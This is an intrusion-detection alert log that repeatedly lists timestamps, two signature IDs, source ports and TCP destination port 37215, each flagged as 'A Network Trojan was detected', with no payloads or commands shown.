                  Timestamp:07/10/24-08:27:22.922579
                  SID:2835222
                  Source Port:33364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.779688
                  SID:2829579
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.882503
                  SID:2829579
                  Source Port:45820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.568589
                  SID:2835222
                  Source Port:50674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.567410
                  SID:2829579
                  Source Port:35718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695229
                  SID:2835222
                  Source Port:36506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469526
                  SID:2835222
                  Source Port:59488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.145425
                  SID:2829579
                  Source Port:44726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.863251
                  SID:2829579
                  Source Port:56126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.268037
                  SID:2835222
                  Source Port:34096
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.361562
                  SID:2835222
                  Source Port:41146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.598590
                  SID:2835222
                  Source Port:35346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322127
                  SID:2829579
                  Source Port:60534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494991
                  SID:2829579
                  Source Port:41092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.908493
                  SID:2835222
                  Source Port:42986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.443294
                  SID:2829579
                  Source Port:33612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.758689
                  SID:2835222
                  Source Port:49228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.590794
                  SID:2835222
                  Source Port:41784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2829579
                  Source Port:48920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144777
                  SID:2829579
                  Source Port:53562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.181411
                  SID:2835222
                  Source Port:46086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.574403
                  SID:2835222
                  Source Port:45816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2835222
                  Source Port:53020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.879237
                  SID:2835222
                  Source Port:34370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2829579
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.368400
                  SID:2829579
                  Source Port:37538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229660
                  SID:2835222
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.595763
                  SID:2829579
                  Source Port:59138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.454576
                  SID:2835222
                  Source Port:52748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.160478
                  SID:2829579
                  Source Port:40372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.780678
                  SID:2835222
                  Source Port:53872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.874680
                  SID:2835222
                  Source Port:49686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533467
                  SID:2829579
                  Source Port:49746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.956514
                  SID:2829579
                  Source Port:39756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.833154
                  SID:2835222
                  Source Port:52398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.816832
                  SID:2829579
                  Source Port:33920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.612913
                  SID:2835222
                  Source Port:36854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.876739
                  SID:2835222
                  Source Port:58316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322018
                  SID:2835222
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.544056
                  SID:2829579
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2829579
                  Source Port:50458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021519
                  SID:2835222
                  Source Port:34210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.874415
                  SID:2829579
                  Source Port:52588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.746967
                  SID:2829579
                  Source Port:39966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.522844
                  SID:2829579
                  Source Port:36688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.024313
                  SID:2829579
                  Source Port:34028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.644990
                  SID:2829579
                  Source Port:55930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198979
                  SID:2829579
                  Source Port:54454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.518597
                  SID:2835222
                  Source Port:42608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.307876
                  SID:2835222
                  Source Port:41562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479051
                  SID:2829579
                  Source Port:51968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.227132
                  SID:2829579
                  Source Port:48480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113849
                  SID:2835222
                  Source Port:33836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469332
                  SID:2835222
                  Source Port:34076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.386841
                  SID:2835222
                  Source Port:32822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.638675
                  SID:2835222
                  Source Port:46860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.991583
                  SID:2829579
                  Source Port:45318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.522324
                  SID:2829579
                  Source Port:48976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633104
                  SID:2829579
                  Source Port:49684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.161476
                  SID:2829579
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406551
                  SID:2829579
                  Source Port:51046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.978564
                  SID:2829579
                  Source Port:46602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.295314
                  SID:2829579
                  Source Port:54790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861312
                  SID:2835222
                  Source Port:41620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.822867
                  SID:2835222
                  Source Port:50378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.058649
                  SID:2829579
                  Source Port:32890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.335280
                  SID:2835222
                  Source Port:41460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2835222
                  Source Port:46212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.578082
                  SID:2835222
                  Source Port:46772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2835222
                  Source Port:41338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.350346
                  SID:2835222
                  Source Port:52062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.247810
                  SID:2835222
                  Source Port:53968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.666761
                  SID:2829579
                  Source Port:55732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.722958
                  SID:2829579
                  Source Port:39666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.657439
                  SID:2835222
                  Source Port:49172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.239368
                  SID:2829579
                  Source Port:50934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.842272
                  SID:2829579
                  Source Port:38516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842047
                  SID:2829579
                  Source Port:45070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034414
                  SID:2835222
                  Source Port:48430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.891994
                  SID:2835222
                  Source Port:40444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.299032
                  SID:2829579
                  Source Port:48560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875452
                  SID:2835222
                  Source Port:38498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640486
                  SID:2835222
                  Source Port:43344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.168197
                  SID:2829579
                  Source Port:38358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.854499
                  SID:2829579
                  Source Port:54964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152132
                  SID:2829579
                  Source Port:50558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.378984
                  SID:2835222
                  Source Port:37154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.166168
                  SID:2835222
                  Source Port:54266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.567631
                  SID:2835222
                  Source Port:49198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997366
                  SID:2829579
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.633686
                  SID:2829579
                  Source Port:43918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.154105
                  SID:2829579
                  Source Port:42354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.870525
                  SID:2829579
                  Source Port:60984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156577
                  SID:2835222
                  Source Port:43202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.538381
                  SID:2835222
                  Source Port:54622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.542013
                  SID:2829579
                  Source Port:39876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.819517
                  SID:2835222
                  Source Port:36188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911509
                  SID:2835222
                  Source Port:33834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.407750
                  SID:2829579
                  Source Port:32864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.821944
                  SID:2829579
                  Source Port:54386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.162511
                  SID:2829579
                  Source Port:48994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865021
                  SID:2829579
                  Source Port:47966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750932
                  SID:2829579
                  Source Port:37616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404387
                  SID:2829579
                  Source Port:44626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.458086
                  SID:2829579
                  Source Port:50606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.841961
                  SID:2835222
                  Source Port:59614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005706
                  SID:2829579
                  Source Port:42726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.988913
                  SID:2829579
                  Source Port:48840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835700
                  SID:2829579
                  Source Port:33326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.576157
                  SID:2829579
                  Source Port:49830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.322719
                  SID:2835222
                  Source Port:35058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.818731
                  SID:2835222
                  Source Port:48334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.637251
                  SID:2835222
                  Source Port:49842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041240
                  SID:2835222
                  Source Port:59080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.060158
                  SID:2829579
                  Source Port:55450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996170
                  SID:2835222
                  Source Port:34324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.685142
                  SID:2835222
                  Source Port:36820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.768963
                  SID:2829579
                  Source Port:40030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.518951
                  SID:2835222
                  Source Port:46876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.556430
                  SID:2829579
                  Source Port:55336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.740635
                  SID:2829579
                  Source Port:45018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.876491
                  SID:2829579
                  Source Port:46480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650835
                  SID:2835222
                  Source Port:35566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.783625
                  SID:2829579
                  Source Port:37236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.523162
                  SID:2829579
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2829579
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746894
                  SID:2835222
                  Source Port:57400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069203
                  SID:2829579
                  Source Port:58218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.986495
                  SID:2829579
                  Source Port:53554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.349128
                  SID:2835222
                  Source Port:36902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.012279
                  SID:2835222
                  Source Port:59986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.800330
                  SID:2829579
                  Source Port:39980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994727
                  SID:2829579
                  Source Port:36780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2835222
                  Source Port:36996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.985720
                  SID:2829579
                  Source Port:34836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.743093
                  SID:2835222
                  Source Port:37260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2829579
                  Source Port:57910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.174842
                  SID:2829579
                  Source Port:59000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.070223
                  SID:2829579
                  Source Port:36212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202822
                  SID:2835222
                  Source Port:33362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702114
                  SID:2829579
                  Source Port:32872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.521213
                  SID:2829579
                  Source Port:57746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.978087
                  SID:2829579
                  Source Port:40434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.999483
                  SID:2835222
                  Source Port:60800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2829579
                  Source Port:38438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.151857
                  SID:2829579
                  Source Port:42366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.507674
                  SID:2835222
                  Source Port:60270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.581201
                  SID:2835222
                  Source Port:40144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2829579
                  Source Port:47084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.598887
                  SID:2835222
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623899
                  SID:2835222
                  Source Port:36888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.187520
                  SID:2835222
                  Source Port:36340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.651918
                  SID:2829579
                  Source Port:50528
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489140
                  SID:2829579
                  Source Port:58646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.306995
                  SID:2829579
                  Source Port:35268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008169
                  SID:2835222
                  Source Port:46742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.192031
                  SID:2829579
                  Source Port:49428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.013790
                  SID:2829579
                  Source Port:46992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.564430
                  SID:2835222
                  Source Port:51554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.367348
                  SID:2835222
                  Source Port:33682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.576463
                  SID:2835222
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.975587
                  SID:2835222
                  Source Port:48142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.129960
                  SID:2835222
                  Source Port:50658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644790
                  SID:2835222
                  Source Port:42506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.606817
                  SID:2835222
                  Source Port:60510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2829579
                  Source Port:58894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.779688
                  SID:2835222
                  Source Port:55378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.532371
                  SID:2829579
                  Source Port:34720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:36352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.554172
                  SID:2835222
                  Source Port:45432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512071
                  SID:2829579
                  Source Port:56408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.437345
                  SID:2829579
                  Source Port:39268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301586
                  SID:2835222
                  Source Port:56342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.504767
                  SID:2835222
                  Source Port:44658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.812422
                  SID:2835222
                  Source Port:35322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.224904
                  SID:2829579
                  Source Port:46370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.670364
                  SID:2829579
                  Source Port:60124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.559919
                  SID:2829579
                  Source Port:35718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.549357
                  SID:2829579
                  Source Port:59630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997409
                  SID:2835222
                  Source Port:55556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105620
                  SID:2835222
                  Source Port:34696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.904469
                  SID:2829579
                  Source Port:33826
                  Destination Port:37215
                  Protocol:TCP
